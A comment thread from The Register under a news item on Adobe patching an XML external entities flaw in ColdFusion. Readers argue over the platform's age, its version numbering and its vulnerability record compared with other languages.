back to article Adobe ices ColdFusion server admin password, file hack hole

Adobe has patched a hole in ColdFusion that could have allowed hackers to gain access to files and passwords stored on servers. The applications platform is used by some 30 million websites. The XML external entities injection vulnerability triggers when XML word documents are processed, Legal Hackers security researcher …

  1. Bronek Kozicki Silver badge
    Facepalm

    The real news here is ...

    "The ancient applications platform is used by some 30 million websites"

    Some people have no fear of anything. Or, more often, do not know enough to fear the thing they see.

    1. bdw429s

      Re: The real news here is ...

      The average age of web technology is about 23 yrs old. (HTML, SQL, Java, Ruby, Javascript, .NET, Python, etc) ColdFusion is 21 yrs old which literally makes it younger than average. I'm really curious how the author of this article justifies calling it "ancient". The versions affected by this bug are only a few years old and here's the kicker-- the bug wasn't even in ColdFusion proper!! It's a bug in the Apache POI libraries that they were bundling.

  2. Pascal Monett Silver badge

    Confusing version numbers - as usual

    Well, Coldfusion has apparently gone from Version 11 to Version 2016.

    That is an immense help when trying to determine version history. When will vendors decide upon a version numbering scheme and bloody stick to it ?

    Is that a Marketing idea ? Shoot them, please.

    1. Crazy Operations Guy Silver badge

      Re: Confusing version numbers - as usual

      Indeed. I've always very much preferred the X.Y.z versioning scheme.

      X is incremented when the product changes enough or introduces enough new functionality to make it a drop-in replacement for the previous version (EG, may need DB schema change or no-longer supports a certain set of Operating Systems). Or at the very least represents a major milestone in development.

      Y is incremented when a new feature is implemented that doesn't require any changes to the rest of the system (although may prevent downgrades). Should be compatible with anything else within the 'X' version family.

      Z is the patch level the system can be upgraded to a later 'z' version without any changes and a system admin can upgrade without needing any testing. Usually a new version is produced monthly / twice-monthly.

      The vast majority of software follows this model, but too many prolific software projects don't (Linux Kernel, OS X, etc.).

      I can accept 2016 as a version number if the whole version is based on it like <year>.<month>.<day> and it has a very rapid development cycle (where new versions are built weekly, if not daily). Otherwise, it seems pretty pointless.

      1. bdw429s

        Re: Confusing version numbers - as usual

        Actually adobe DOES use a standard version number, 2016 is just the "major" version. For instance, the current latest version of CF is 2016.0.02.299200 which represents update level 2 and the last bit is the build number. They've always used this-- the major version just had a little "jump" from 11. As far as marketing goes, they only use the major version, which is pretty much standard in a lot of software.

  3. Ol'Peculier

    Ancient applications platform?

    CF was released in 1995, a year after PHP. And the latest version was released only 7 months ago.

    I know you guys don't "get" CF, but it is used by a hell of a lot of very large companies and various government bodies. (yes, I use it and have done for since CF4.5...)

    1. Jonathan 27 Bronze badge

      It's not the age of the platform as a whole, but the age of the feature-set. PHP has been updated many times (as is still not considered state of the art), and includes full class support among other things. ColdFusion is very much behind the times feature-wise. I work with a wide variety of programming languages, including ColdFusion and I would not recommend it for future projects. Adobe is just barely keeping the product alive at this point and you can be more productive using other tools.

      If you're one of those guys who "only knows ColdFusion", start learning Python, .NET MVC, Node.JS or Ruby on Rails. ColdFusion has passed its best before date at this point.

      1. bdw429s

        Please tell me specifically how ColdFusion as a platform is behind? It's a multi-paradigmed modern JVM scripting language with OO and FP constructs, Java/.NET interop, more out-of-the-box integrations than any of the other langs you listed, enterprise modular MVC frameworks, CLI tooling, package management, and free open source engines. I know several languages, and I still choose CF for my everyday job due to it's great productivity. What am I missing by using CF?

  4. This post has been deleted by its author

    1. quxinot Silver badge

      Re: Adobe fixes a bug...

      At least then you'd have gotten laid.

      Using Adobe products usually means you are the one getting screwed, instead.

    2. bdw429s

      Re: Adobe fixes a bug...

      Your comments are statistically _very_ in accurate. ColdFusion has fewer vulnerabilities every year than PHP, Java, or .NET. In fact, Java and PHP literally have about 6 times more vulns found every year! Where are your stats coming from? Mine are right here:

      http://www.codersrevolution.com/blog/whos-had-more-vulns-redux-php-java-coldfusion-ror-or-net

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2020